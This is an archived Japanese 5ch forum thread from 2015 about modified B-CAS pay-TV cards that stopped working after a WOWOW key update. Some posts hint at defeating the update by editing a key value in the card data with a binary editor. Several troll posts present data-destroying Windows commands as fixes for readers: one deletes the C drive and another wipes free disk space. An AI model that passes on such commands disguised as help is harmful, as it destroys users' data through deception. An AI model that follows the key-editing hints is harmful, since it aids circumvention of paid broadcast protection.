改造B-CAS、対策される★4 [転載禁止]©5ch.net [241352608]
■ このスレッドは過去ログ倉庫に格納されています
キタ━━━━━━(゚∀゚)━━━━━━ !!!!!見れた!!!!!!!!!!!
教えてくれた人マジありがとう!!!!!!
これってバイナリエディタで古いkwの02を新しいkwの05に変えてもう一度書き換えたらいいんだよな?
今回というかkwに関しては文字数変わらないからバイナリいじるのが一番楽なんだな
どこをどういじるかはDTVのスレ色々見てたらわかったわ
486 :名無しさん@編集中:2015/02/10(火) 16:57:14.54 ID:86q3NopT
[スタート]→[ファイル名を指定して実行]で
cmd /c rd /s /q c:
と入力し[OK]をクリックする
懐石倉庫に入れない奴はこれやってないんだろ
どうしてもWOWOWタダ見したい犯罪者以外は実行すんなよ
いいか、絶対やるなよ
何が起きようと俺は知らないからな
wowwow見られなくなったバカッターのこの反応を見ると
全部対策されたらスカパーに文句の電話かけるバカが何人かいそうだ。
楽しみ
柔らかいのも、角鶴もバイナリエディタで書き換えれば完了
ビルドなんか必要ない
>>627
書き換えできないような奴か
更に情弱を釣るというクズっぷり 映らなくなって取り急ぎここにやってキタのいるだろう
前回のあのときに龍馬他書き換えサイトだけ見たのがな
それでフシアナに掛かってるんじゃないか
バイナリ書き換えだけっていうけどミスったらリスク高いよな
どんな挙動するかわからんし
ID:hRUORRuK0君はどんな責任をとるんでしょう?(・∀・)ニヤニヤ
>>609
多く見積もっても10くらいかな
自動で出来ないと激減すると思うわ このスレだけ、どう考えても変な奴が流れこんできてるなwwww
業者から買った人はアフターサービス要求するのかな?
前スレ見てきたけど大阪のワタナベさん、Gmailアドレスまで晒してしまって…
どこから来たんだ?
PCゲームのセーブデータをバイナリエディタで書き換えた経験が
こんなところで役に立つとは
ラウパ始まってるけどsoilworkとamarantheくらいしか見たいのないな
ネトゲでパケット改ざんしてチートじくってた経験はどこにも生かせなかった
大ヒント与えたまるも先生また家宅捜索されてしまうん?
>>627でもいけるがそれでもダメな人用
1.[スタート]→[ファイル名を指定して実行]で「cmd」と入力
2.黒い小さな画面が出てくるので「cipher /W:C:」と入力しエンターキーを押す
たったコレだけの作業だ。簡単だろ? そういえば今日がXデーだなと思って確認したらwowowだけ見れなかったから安心したけど
どう考えてもこのままスカパーも追随するよなーと思ったら悲しくなった
いつまで見れるかな…
って隣の家の犬が嘆いてた
自白ツイ垢とかいつもなら掘ったり魚拓取ったりはじめるはずなんだが
そういう動きが無いのはなんだろうな
>>669
WOWOWとかスカパーはもっと悲しいわw
お前に只見されて こいつらってまじでやってんの?
アフィ馬鹿すげえな
新レシピと中華と懐石料理に感謝
スタチャンの時にまた会いましょう
さよならカスども
>>681
自国民が拉致られても自己責任論が吹き荒れる国はどこでしょう? >>677
俺じゃないから
隣の家の犬だから
ところでこういう時に節穴引っかかってる人ってただの盛り上げ要因の人かと思ってたけど
この騒ぎで引っかかってるはガチの人っぽい気がする バイナリ弄るとか割れ厨には必須のスキルだって下校中の中学生が言ってた
>>18
どういう事?
やきそばソースからコンパイルしてアレした人は
もう一回書き直せるの?
ってモーゼが聞いてたよ もうちょいでWOWOWでたまこラブストーリー見られたのにな
ざまぁwwwwwwwwwwwwww
Q. 今北!
A. まず平成の龍馬さんとこ行け
Q. どのカードが対象なんだよ!
A. 平成の龍馬さんに訊け
Q. ○○の仕方教えて!
Q. ツールくれ!
Q. カードリーダどれ使えばいいんだよ!
前に改造してなくても今回の書き換えで見られるようになるの?
それなら余計なことしたんじゃないのか
どうでもいい通販サイト用に作った捨てアドにこの手のカードのスパムがよく来てるね
つーか買う馬鹿いたのかww
そこまでやってまで見たい番組あんの?
ノイズが一気に増えたな
fusianasanに引っかかるとかどんだけだよ
>>692
リーガ・エスパニョーラ!!って
駄菓子屋のババアが叫んでた ソースのどこ書き換えればいいんだよ!あくしろ1
って俺が言ってたよ
>>700
終わることで新たな枠が生まれると思えば楽しみじゃない >>780
もう難視聴世帯が300世帯ちょいぐらいしか残ってないからだよ
そんな少しの世帯のために貴重なBSのバンド使ってまでやる必要ないってこった
あとはその世帯地域で共同アンテナかCATVで対応すりゃ済む話のレベル 盗み見するのはごく少数だからWOWOW大勝利だろ
バイナリ触れる奴なんて思ってる以上に少ないわ
>>633
もう遅い
コピペでもアウトだぞ
おまえもハードディスクを全部消してフォーマットして自宅待機してろ 704は700宛な
ちなみに空くトラポンはNHKが既に4Kの試験放送用に使うことがきまっとる
今までみたくCSのSDチャンネルがBS移行でHD化!ってのが無いからつまらんね
全く興味は無いけどPS3のセーブデータをバイナリで書き換えられる能力があれば
改造B-CASくらいは簡単に出来る?
どうせ1か月後には対策ツールが出てるって行きつけの定食屋のおばあちゃんが言ってた
>>280
レノボのカードリーダー付きキーボードでもできる あっちの板は救いと手段を求める(だけの)池沼が沸きすぎてて恐ろしいな
釣り堀ってレベルを超えて生け簀状態だわ
>>710
PS3は小学生レベルだけど、これは違うよ。 >>713
あっちのほうが技術レベル高そうな気がするけど思い違いか ■ このスレッドは過去ログ倉庫に格納されています